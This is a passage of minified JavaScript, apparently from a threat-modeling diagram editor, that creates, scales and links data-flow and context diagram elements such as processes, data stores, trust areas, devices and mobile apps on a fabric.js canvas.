T=null;if(n.ElementTypeID==Et.PhyProcessing||n.ElementTypeID==Et.LogProcessing?T=this.createProcessing(e-0,i-0,r):n.ElementTypeID==Et.PhyDataStore||n.ElementTypeID==Et.LogDataStore?T=this.createDataStore(e-0,i-0,r):n.ElementTypeID==Et.PhyExternalEntity||n.ElementTypeID==Et.LogExternalEntity?T=this.createExternalEntity(e-0,i-0,r):n.ElementTypeID==Et.DataFlow?T=this.createFlow(e-0,i-0,e-0+200,i-0,r):n.ElementTypeID==Et.PhyTrustArea||n.ElementTypeID==Et.LogTrustArea?T=this.createTrustArea(e-0,i-0,r):n.ElementTypeID==Et.PhysicalLink?T=this.createPhysicalLink(e-0,i-0,r):n.ElementTypeID==Et.Interface&&(T=this.createInterface(e-0,i-0,r)),null!=T)return this.Diagram.Elements.AddChild(r),this.Canvas.add(T),(n.ElementTypeID==Et.PhyTrustArea||n.ElementTypeID==Et.LogTrustArea)&&this.Canvas.sendToBack(T),this.SelectionChanged.emit(r),this.onCanvasModified(),r}getFlowAnchorPoint(a,e){if(e[ot.myType]==wt.Process){if([_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(a)){if(a==_i.NorthEast)return[e.left+e.width-5,e.top+5];if(a==_i.NorthWest)return[e.left+5,e.top+5];if(a==_i.SouthEast)return[e.left+e.width-5,e.top+e.height-5];if(a==_i.SouthWest)return[e.left+5,e.top+e.height-5]}}else if(e[ot.myType]==wt.DataStore){if([_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(a)){if(a==_i.NorthEast)return[e.left+e.width,e.top+7];if(a==_i.NorthWest)return[e.left,e.top+7];if(a==_i.SouthEast)return[e.left+e.width,e.top+e.height-7];if(a==_i.SouthWest)return[e.left,e.top+e.height-7]}}else if(e[ot.myType]==wt.PhysicalLink&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(a)){const i=e.width/7;if(a==_i.NorthWest)return[e.left+i,e.top];if(a==_i.SouthEast)return[e.left+e.width-i,e.top+e.height]}return super.getFlowAnchorPoint(a,e)}subscribeScaling(a){switch(a[ot.myType]){case wt.DataStore:a.on("scaling",e=>this.onScaleDataStore(e));break;case wt.Process:a.on("scaling",e=>this.onScaleProcessing(e));break;case wt.ExternalEntity:a.on("scaling",e=>this.onScaleExternalEntity(e));break;case wt.PhysicalLink:a.on("scaling",e=>this.onScalePhysicalLink(e));break;case wt.Interface:a.on("scaling",e=>this.onScaleInterface(e));break;case wt.TrustArea:a.on("scaling",e=>this.onScaleTrustArea(e));break;default:[wt.Annotation,wt.TextPosPoint,wt.ElementName,wt.DataFlowLine,wt.DataFlowArrowE,wt.DataFlowCircle,wt.DataFlowPoint].includes(a[ot.myType])||console.error("Unknown type: ",a,a[ot.myType])}}getViewBaseElement(a){return this.dataService.Project.GetDFDElement(a)}getViewBaseElements(){return this.dataService.Project.GetDFDElements()}createDataStore(a,e,i){const c=new Ei.fabric.Path(this.createDataStorePath(140,75),{fill:"transparent",stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,myType:wt.ElementBorder}),d=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:2,myType:wt.ElementType}),T=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:70,top:59,myType:wt.ElementPhyElement}),q=[c,d,new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),T,...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(te=>{var pe;return null===(pe=q.find(Re=>Re[ot.fa]==te))||void 0===pe?void 0:pe.set(ot.visible,!1)});const Y=new Ei.fabric.Group(q,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.DataStore});return Y.on("scaling",te=>this.onScaleDataStore(te)),Y.setControlsVisibility({mtr:!1}),Y}createDataStorePath(a,e){return["M 0 8 L 0",(e-9).toString(),"A 10 1.3 0 0 0",a.toString(),(e-9).toString(),"L",a.toString(),"8 A 10 1.3 0 0 0 0 8 A 10 1.3 0 0 0",a.toString(),"8"].join(" ")}onScaleDataStore(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(T=>T[ot.myType]==wt.ElementBorder),n=e._objects.find(T=>T[ot.myType]==wt.ElementType),r=e.width*e.scaleX,c=e.height*e.scaleY;i.set({height:c,width:r,scaleX:1,scaleY:1,left:-r/2,top:-c/2});const d=new Ei.fabric.Path(this.createDataStorePath(r,c));i.set("path",d.path),i.set("pathOffset",{x:r/2,y:c/2}),i.setCoords(),n&&n.set({left:0,top:-c/2+2}),this.onCanvasModified()}createProcessing(a,e,i){const c=new Ei.fabric.Rect({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,rx:15,ry:15,width:140,height:75,fill:"transparent",myType:wt.ElementBorder});let d=null,T=null;i.GetProperties().some(Re=>Re.Type==Ii.DiagramReference)&&(d=new Ei.fabric.Line([15,0,15,75],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth}),T=new Ei.fabric.Line([125,0,125,75],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth}));const k=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:5,myType:wt.ElementType}),q=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:70,top:59,myType:wt.ElementPhyElement}),Y=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),te=[c];d&&te.push(d,T),te.push(k,Y,q,...this.createFlowAnchors(140,75,!0,!0,!1,!0)),4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Re=>{var Fe;return null===(Fe=te.find(Ne=>Ne[ot.fa]==Re))||void 0===Fe?void 0:Fe.set(ot.visible,!1)});const pe=new Ei.fabric.Group(te,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:"P",subTargetCheck:!0});return pe.on("scaling",Re=>this.onScaleProcessing(Re)),pe.setControlsVisibility({mtr:!1}),pe}onScaleProcessing(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),this.onCanvasModified()}createExternalEntity(a,e,i){const c=new Ei.fabric.Rect({stroke:i instanceof td?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:140,height:75,fill:"transparent",myType:wt.ElementBorder}),d=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:5,myType:wt.ElementType}),T=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:70,top:59,myType:wt.ElementPhyElement}),q=[c,d,new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),T,...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(te=>{var pe;return null===(pe=q.find(Re=>Re[ot.fa]==te))||void 0===pe?void 0:pe.set(ot.visible,!1)});const Y=new Ei.fabric.Group(q,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.ExternalEntity});return Y.on("scaling",te=>this.onScaleExternalEntity(te)),Y.setControlsVisibility({mtr:!1}),Y}onScaleExternalEntity(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),this.onCanvasModified()}createPhysicalLink(a,e,i){const k=[new Ei.fabric.Polygon([{x:20,y:0},{x:140,y:0},{x:120,y:75},{x:0,y:75}],{stroke:i instanceof td?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:75,top:5,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:67,top:29.5,textAlign:"center",myType:wt.ElementName}),...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.PhysicalLink});return q.on("scaling",Y=>this.onScalePhysicalLink(Y)),q.setControlsVisibility({mtr:!1}),q}onScalePhysicalLink(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(d=>d[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),i.set("points",[{x:n/7,y:0},{x:n,y:0},{x:n-n/7,y:r},{x:0,y:r}]),i.set("pathOffset",{x:n/2,y:r/2}),this.onCanvasModified()}createInterface(a,e,i){const k=[new Ei.fabric.Polygon([{x:0,y:0},{x:120,y:0},{x:140,y:37.5},{x:120,y:75},{x:0,y:75},{x:20,y:37.5}],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:75,top:5,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:75,top:29.5,textAlign:"center",myType:wt.ElementName}),...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.Interface});return q.on("scaling",Y=>this.onScaleInterface(Y)),q.setControlsVisibility({mtr:!1}),q}onScaleInterface(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(d=>d[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),i.set("points",[{x:0,y:0},{x:n-n/7,y:0},{x:n,y:r/2},{x:n-n/7,y:r},{x:0,y:r},{x:n/7,y:r/2}]),i.set("pathOffset",{x:n/2,y:r/2}),this.onCanvasModified()}createTrustArea(a,e,i,n=350,r=200){const c=new Ei.fabric.Rect({stroke:i instanceof td||i instanceof zm?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:n,height:r,strokeDashArray:[10,5],fill:"transparent",myType:wt.ElementBorder}),d=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"left",originY:"top",left:5,top:20,myType:wt.ElementType}),T=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"left",originY:"top",left:5,top:35,myType:wt.ElementPhyElement}),k=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"left",originY:"top",left:5,top:5,myType:wt.ElementName}),q=new Ei.fabric.Group([c,k,d,T],{left:a,top:e,hasControls:!0,hasBorders:!1,lockRotation:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.TrustArea});return q.on("scaling",Y=>this.onScaleTrustArea(Y)),q.setControlsVisibility({mtr:!1}),q}onScaleTrustArea(a){this.onScaleElement(a);const e=a.transform.target,i=e._objects.find(k=>k[ot.myType]==wt.ElementBorder),n=e._objects.find(k=>k[ot.myType]==wt.ElementType),r=e._objects.find(k=>k[ot.myType]==wt.ElementPhyElement),c=e._objects.find(k=>k[ot.myType]==wt.ElementName),d=e.width*e.scaleX,T=e.height*e.scaleY;i.set({height:T,width:d,scaleX:1,scaleY:1,left:-d/2,top:-T/2}),n.set({left:-d/2+5,top:-T/2+20}),null==r||r.set({left:-d/2+5,top:-T/2+35}),c.set({left:-d/2+5,top:-T/2+5}),this.onCanvasModified()}}class R7 extends D2{constructor(a,e,i,n,r,c,d){super(a,e,i,n,r,c),this.IsContextDiagram=!1,this.IsUseCaseDiagram=!1,this.IsContextDiagram="context"==d,this.IsUseCaseDiagram="use-case"==d}CopyElement(){this.SelectedElement instanceof As||this.SelectedElement instanceof Hg||this.SelectedElement instanceof Ou||this.SelectedElement instanceof cf||(this.copyID=this.SelectedElement.ID)}PasteElement(){if(!this.copyID)return;const a=this.getViewBaseElement(this.copyID),e=this.getCanvasElementByID(this.copyID);if(a){const i=this.createElement({contextRef:{name:nM.ToString(a.Type)}},e.left+e.width+10,e.top);i.CopyFrom(a.Data),i.Name+="-Copy";const n=this.getCanvasElementByID(i.ID);n.set("width",e.width),n.set("height",e.height),this.fireScaling(n),this.copyID=null}}initializeCanvas(a){return!!super.initializeCanvas(a)&&(this.IsContextDiagram&&(this.dataService.Project.GetDevices().filter(e=>!(e instanceof As)).forEach(e=>{if(!this.getCanvasElementByID(e.ID)){let n=this.createDevice(a.clientWidth/2-100,a.clientHeight/2-100,e,!0);e.NameChanged.subscribe(r=>this.changeObjectName(e.ID)),this.Diagram.Elements.AddChild(e),this.Canvas.add(n),this.onCanvasModified()}e.DeviceInterfaceNameChanged.subscribe(n=>this.changeDeviceInterfaceVisibility(e))}),this.dataService.Project.GetMobileApps().filter(e=>!(e instanceof As)).forEach(e=>{if(!this.getCanvasElementByID(e.ID)){let n=this.createMobileApp(a.clientWidth/2-100,a.clientHeight/2-100,e,!0);e.NameChanged.subscribe(r=>this.changeObjectName(e.ID)),this.Diagram.Elements.AddChild(e),this.Canvas.add(n),this.onCanvasModified()}e.MobileAppInterfaceNameChanged.subscribe(n=>this.changeMobileAppInterfaceVisibility(e))})),this.dataService.Project.ContextElementsChanged.subscribe(e=>{e.Type==Ja.Removed&&this.deleteElement(e.ID)}),!0)}instantiateFlow(){return ns.Instantiate(Aa.Flow,this.dataService.Project,this.dataService.Config)}getFlowAnchorPoint(a,e){if(e[ot.myType]==wt.DeviceInterface){let i=e._objects.find(n=>n[ot.myType]==wt.ElementBorder);return a==_i.North?[e.left+e.width/2+i.left+i.width/2,e.top+e.height/2+i.top]:a==_i.East?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top+i.height/2]:a==_i.South?[e.left+e.width/2+i.left+i.width/2,e.top+e.height/2+i.top+i.height]:a==_i.West?[e.left+e.width/2+i.left,e.top+e.height/2+i.top+i.height/2]:a==_i.NorthWest?[e.left+e.width/2+i.left,e.top+e.height/2+i.top]:a==_i.NorthEast?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top]:a==_i.SouthEast?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top+i.height]:a==_i.SouthWest?[e.left+e.width/2+i.left,e.top+e.height/2+i.top+i.height]:null}if(e[ot.myType]==wt.Interactor){let i=e._objects.find(r=>r[ot.myType]==wt.InteractorArms);return e._objects.find(r=>r[ot.myType]==wt.InteractorLeg1),a==_i.North?[e.left+e.width/2,e.top+5]:a==_i.East?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top+i.height/2]:a==_i.South?[e.left+e.width/2,e.top+e.height/2+10]:a==_i.West?[e.left+e.width/2+i.left,e.top+e.height/2+i.top+i.height/2]:null}return super.getFlowAnchorPoint(a,e)}createElement(a,e,i){if(!a.contextRef)return null;let n,r=null;if(a.contextRef.elementType==Aa.Device){let c=this.dataService.Project.GetContextElement(a.contextRef.elementID);n=As.InstantiateRef(c,this.dataService.Project,this.dataService.Config),r=this.createDevice(e,i,n,!1)}else if("Device"==a.contextRef.name){n=this.dataService.Project.CreateDevice();const c=n;"1"==a.contextRef.type&&(c.InterfaceTop=c.InterfaceRight=c.InterfaceBottom=c.InterfaceLeft=So.None),r=this.createDevice(e,i,n,"2"==a.contextRef.type),this.NavTreeChanged.emit()}else if(a.contextRef.elementType==Aa.MobileApp){let c=this.dataService.Project.GetContextElement(a.contextRef.elementID);n=As.InstantiateRef(c,this.dataService.Project,this.dataService.Config),r=this.createMobileApp(e,i,n,!1)}else if("App"==a.contextRef.name){n=this.dataService.Project.CreateMobileApp();const c=n;"1"==a.contextRef.type&&(c.InterfaceTop=c.InterfaceRight=c.InterfaceBottom=c.InterfaceLeft=So.None),r=this.createMobileApp(e,i,n,"2"==a.contextRef.type),this.NavTreeChanged.emit()}else if(a.contextRef.elementType==Aa.Interactor){let c=this.dataService.Project.GetContextElement(a.contextRef.elementID);n=As.InstantiateRef(c,this.dataService.Project,this.dataService.Config),r=this.createInteractor(e,i,n)}else"Interactor"==a.contextRef.name?(n=ns.Instantiate(Aa.Interactor,this.dataService.Project,this.dataService.Config),r=this.createInteractor(e,i,n)):a.contextRef.name.startsWith("Interface")?(n=ns.Instantiate(Aa.Interface,this.dataService.Project,this.dataService.Config),r=this.createInterface(e,i,n,a.contextRef.name)):"Use Case"==a.contextRef.name?(n=ns.Instantiate(Aa.UseCase,this.dataService.Project,this.dataService.Config),r=this.createUseCase(e,i,n)):"External Entity"==a.contextRef.name?(n=ns.Instantiate(Aa.ExternalEntity,this.dataService.Project,this.dataService.Config),r=this.createExternalEntity(e,i,n)):"Trust Area"==a.contextRef.name&&(n=ns.Instantiate(Aa.TrustArea,this.dataService.Project,this.dataService.Config),r=this.createTrustArea(e,i,n));return n.NameChanged.subscribe(c=>this.changeObjectName(n.ID)),n.OutOfScopeChanged.subscribe(c=>this.changeObjectBorder(n.ID)),n.TypeChanged.subscribe(c=>this.changeObjectType(n.ID,nM.ToString(n.Type))),this.Diagram.Elements.AddChild(n),this.Canvas.add(r),"Trust Area"==a.contextRef.name&&this.Canvas.sendToBack(r),this.SelectionChanged.emit(n),this.onCanvasModified(),n}subscribeScaling(a){switch(a[ot.myType]){case wt.Device:case wt.DeviceReference:a.on("scaling",e=>this.onScaleDevice(e));break;case wt.MobileApp:a.on("scaling",e=>this.onScaleMobileApp(e));break;case wt.Interactor:a.on("scaling",e=>this.onScaleInteractor(e));break;case wt.SystemUseCase:a.on("scaling",e=>this.onScaleUseCase(e));break;case wt.DeviceInterface:a.on("scaling",e=>this.onScaleInterface(e));break;case wt.SystemExternalEntity:a.on("scaling",e=>this.onScaleExternalEntity(e));break;case wt.TrustArea:a.on("scaling",e=>this.onScaleTrustArea(e));break;default:[wt.Annotation,wt.TextPosPoint,wt.ElementName,wt.DataFlowLine,wt.DataFlowArrowE,wt.DataFlowCircle,wt.DataFlowPoint].includes(a[ot.myType])||console.error("Unknown type: ",a,a[ot.myType])}}getViewBaseElement(a){return this.Diagram.Elements.GetChildrenFlat().find(e=>e.ID==a)}getViewBaseElements(){return this.Diagram.Elements.GetChildrenFlat()}createDevice(a,e,i,n){let r=200,c=200;this.IsUseCaseDiagram&&(r=250,c=350);const d=i instanceof As,Y=[new Ei.fabric.Rect({stroke:d?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:r,height:c,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xabDevice\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:25,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:r/2,top:d?5:c/2-8,textAlign:"center",myType:wt.ElementName})],te=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:20,top:c/2,myType:wt.DeviceLabel1}),pe=new Ei.fabric.Line([20,0,20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel1Line}),Re=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:c-16,myType:wt.DeviceLabel2}),Fe=new Ei.fabric.Line([0,c-20,r,c-20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel2Line}),Ne=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:r,top:c/2,myType:wt.DeviceLabel3}),et=new Ei.fabric.Line([r-20,0,r-20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel3Line}),ut=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:5,myType:wt.DeviceLabel4}),Ze=new Ei.fabric.Line([0,20,r,20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel4Line});let yt=null;i instanceof Ou?yt=i:d&&i.Ref instanceof Ou&&(yt=i.Ref),n&&yt.DeviceInterfaceNameChanged.subscribe(St=>this.changeDeviceInterfaceVisibility(yt)),Y.push(te,pe,Re,Fe,Ne,et,ut,Ze),Y.push(...this.createFlowAnchors(r,c,!0,!0,!0,!0));const It=new Ei.fabric.Group(Y,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:d?wt.DeviceReference:wt.Device,subTargetCheck:!0});return It.on("scaling",St=>this.onScaleDevice(St)),this.changeDeviceInterfaceVisibility(yt,It,!n),It.setControlsVisibility({mtr:!1}),It}onScaleDevice(a){this.onScaleElement(a);const e=a.transform.target,i=e._objects.find(Ne=>Ne[ot.myType]==wt.ElementBorder),n=e._objects.find(Ne=>Ne[ot.myType]==wt.ElementName),r=e._objects.find(Ne=>Ne[ot.myType]==wt.ElementType),c=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel1),d=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel1Line),T=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel2),k=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel2Line),q=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel3),Y=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel3Line),te=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel4),pe=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel4Line);let Re=e.width*e.scaleX,Fe=e.height*e.scaleY;i.set({height:Fe,width:Re,scaleX:1,scaleY:1,left:-Re/2,top:-Fe/2}),e[ot.myType]==wt.DeviceReference&&n.set({left:0,top:-Fe/2+5}),null==r||r.set({left:0,top:-Fe/2+25}),null==c||c.set({left:-Re/2+20,top:0}),null==d||d.set({left:-Re/2+20,top:-Fe/2,height:Fe}),null==T||T.set({left:0,top:Fe/2-16}),null==k||k.set({left:-Re/2,top:Fe/2-20,width:Re}),null==q||q.set({left:Re/2,top:0}),null==Y||Y.set({left:Re/2-20,top:-Fe/2,height:Fe}),null==te||te.set({left:0,top:-Fe/2+5}),null==pe||pe.set({left:-Re/2,top:-Fe/2+20,width:Re}),this.onCanvasModified()}changeDeviceInterfaceVisibility(a,e,i=!1){if(null==e&&(e=this.getCanvasElementByID(a.ID)),e){let n=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel1),r=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel1Line),c=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel2),d=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel2Line),T=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel3),k=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel3Line),q=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel4),Y=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel4Line);n.set("text",this.translate.instant(a.InterfaceLeft)),n.set(ot.visible,a.InterfaceLeft!=So.None&&!i),r.set(ot.visible,a.InterfaceLeft!=So.None&&!i),c.set("text",this.translate.instant(a.InterfaceBottom)),c.set(ot.visible,a.InterfaceBottom!=So.None&&!i),d.set(ot.visible,a.InterfaceBottom!=So.None&&!i),T.set("text",this.translate.instant(a.InterfaceRight)),T.set(ot.visible,a.InterfaceRight!=So.None&&!i),k.set(ot.visible,a.InterfaceRight!=So.None&&!i),null==q||q.set("text",this.translate.instant(a.InterfaceTop)),null==q||q.set(ot.visible,a.InterfaceTop!=So.None&&!i),null==Y||Y.set(ot.visible,a.InterfaceTop!=So.None&&!i),this.Canvas.requestRenderAll()}}createMobileApp(a,e,i,n){let r=200,c=200;this.IsUseCaseDiagram&&(r=250,c=350);let q=[new Ei.fabric.Rect({stroke:i instanceof As?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:r,height:c,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xabApp\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:25,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:r/2,top:c/2-8,textAlign:"center",myType:wt.ElementName})],Y=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:20,top:c/2,myType:wt.AppLabel1}),te=new Ei.fabric.Line([20,0,20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel1Line}),pe=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:c-16,myType:wt.AppLabel2}),Re=new Ei.fabric.Line([0,c-20,r,c-20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel2Line}),Fe=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:r,top:c/2,myType:wt.AppLabel3}),Ne=new Ei.fabric.Line([r-20,0,r-20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel3Line}),et=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:5,myType:wt.AppLabel4}),ut=new Ei.fabric.Line([0,20,r,20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel4Line}),Ze=null;i instanceof cf?Ze=i:i instanceof As&&i.Ref instanceof cf&&(Ze=i.Ref),n&&Ze.MobileAppInterfaceNameChanged.subscribe(It=>this.changeMobileAppInterfaceVisibility(Ze)),q.push(Y,te,pe,Re,Fe,Ne,et,ut),q.push(...this.createFlowAnchors(r,c,!0,!0,!0,!0));let yt=new Ei.fabric.Group(q,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.MobileApp,subTargetCheck:!0});return yt.on("scaling",It=>this.onScaleMobileApp(It)),this.changeMobileAppInterfaceVisibility(Ze,yt,!n),yt.setControlsVisibility({mtr:!1}),yt}onScaleMobileApp(a){this.onScaleElement(a);let 